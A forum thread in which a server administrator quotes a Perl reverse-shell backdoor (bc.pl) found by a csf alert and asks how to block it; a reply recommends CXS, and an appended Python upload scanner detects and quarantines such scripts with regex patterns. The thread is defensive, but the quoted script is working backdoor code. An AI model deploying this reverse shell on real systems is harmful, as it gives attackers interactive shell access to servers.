Block certain suspicious files

Posted: 05 Nov 2013, 06:17
by saurabhnsonar
I have got an alert from csf regarding a suspicious file bc.pl on the server with the following content.

#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

This gives direct access to the shell of the server. Can someone suggest how I can stop such a backdoor connect script from working, rather than checking an alert and manually deleting the file every time I get one?
Please help with some suggestions to block this kind of hacking attack.

Thank you!

Re: Block certain suspicious files

Posted: 06 Nov 2013, 23:51
by Sergio
Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.

Sergio
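As an added illustration of what an upload scanner such as CXS does when it "checks every file uploaded to the server and deletes the file on the fly", here is a small Python sketch written for this page; it is not CXS's code and not from either post. It looks for the three stages of the script quoted in the question (an outbound connect, STDIN/STDOUT/STDERR duplicated onto the socket handle, and an interactive /bin/sh spawned on those streams) and only quarantines a file when all three are present, so an ordinary Perl socket client is not flagged. The upload and quarantine directories, file names and the two sample files are constructed assumptions for the self-check.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Indicator rules for a "connect a socket and hand it a shell" backdoor,
# derived from the Perl script quoted in the question. Each rule covers one
# stage of that pattern; a file is only flagged when every stage is present.
INDICATORS = {
    # outbound TCP connection being set up
    "socket_connect": re.compile(r"\bconnect\s*\(", re.I),
    # STDIN/STDOUT/STDERR duplicated onto the socket handle
    "stdio_to_socket": re.compile(r"open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*['\"]>&", re.I),
    # an interactive shell spawned with those redirected streams
    "interactive_shell": re.compile(r"(?:system|exec)\s*\(\s*['\"]/bin/(?:ba)?sh\s+-i", re.I),
}


def score_content(text: str) -> dict:
    """Map each indicator name to whether it matched in the file content."""
    return {name: rx.search(text) is not None for name, rx in INDICATORS.items()}


def is_suspicious(text: str) -> bool:
    """Flag only when the whole connect -> redirect -> shell chain is present."""
    return all(score_content(text).values())


def scan_and_quarantine(path: Path, quarantine_dir: Path) -> bool:
    """Scan one uploaded file; move it into quarantine_dir if it looks like a backdoor.

    Returns True if the file was quarantined. Decoding as latin-1 avoids decode
    errors on binary uploads; such files simply will not match the rules.
    """
    content = path.read_bytes().decode("latin-1")
    if not is_suspicious(content):
        return False
    quarantine_dir.mkdir(parents=True, exist_ok=True)
    target = quarantine_dir / (path.name + ".quarantined")
    shutil.move(str(path), str(target))
    target.chmod(0o000)  # nobody can read or execute it while it waits for review
    return True


# Constructed samples for a self-contained run (assumed content, not real uploads).
# The first reproduces the stages of the script in the question (not a full copy);
# the second is a harmless socket client that fetches a web page and must NOT be flagged.
SAMPLE_BACKDOOR = """#!/usr/bin/perl
use Socket;
connect(SOCKET, $paddr) || die("Error: $!\\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
system('/bin/sh -i');
"""

SAMPLE_BENIGN = """#!/usr/bin/perl
use Socket;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, $paddr) || die("Error: $!\\n");
print SOCKET "GET / HTTP/1.0\\r\\n\\r\\n";
while (<SOCKET>) { print; }
"""


def self_check() -> dict:
    """Write both samples to a temporary 'upload' directory and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        upload = Path(tmp) / "uploads"        # assumed upload directory
        quarantine = Path(tmp) / "quarantine"  # assumed quarantine directory
        upload.mkdir()
        (upload / "bc.pl").write_text(SAMPLE_BACKDOOR)
        (upload / "fetch.pl").write_text(SAMPLE_BENIGN)
        results = {p.name: scan_and_quarantine(p, quarantine) for p in sorted(upload.iterdir())}
        results["quarantined_files"] = len(list(quarantine.iterdir())) if quarantine.exists() else 0
        return results


if __name__ == "__main__":
    print(self_check())
```

In a real deployment this check would be triggered by the web server or FTP daemon on each completed upload (CXS hooks in at that point); requiring all three stages keeps false positives down, and the mode-000 quarantine copy preserves the file for review instead of deleting it outright.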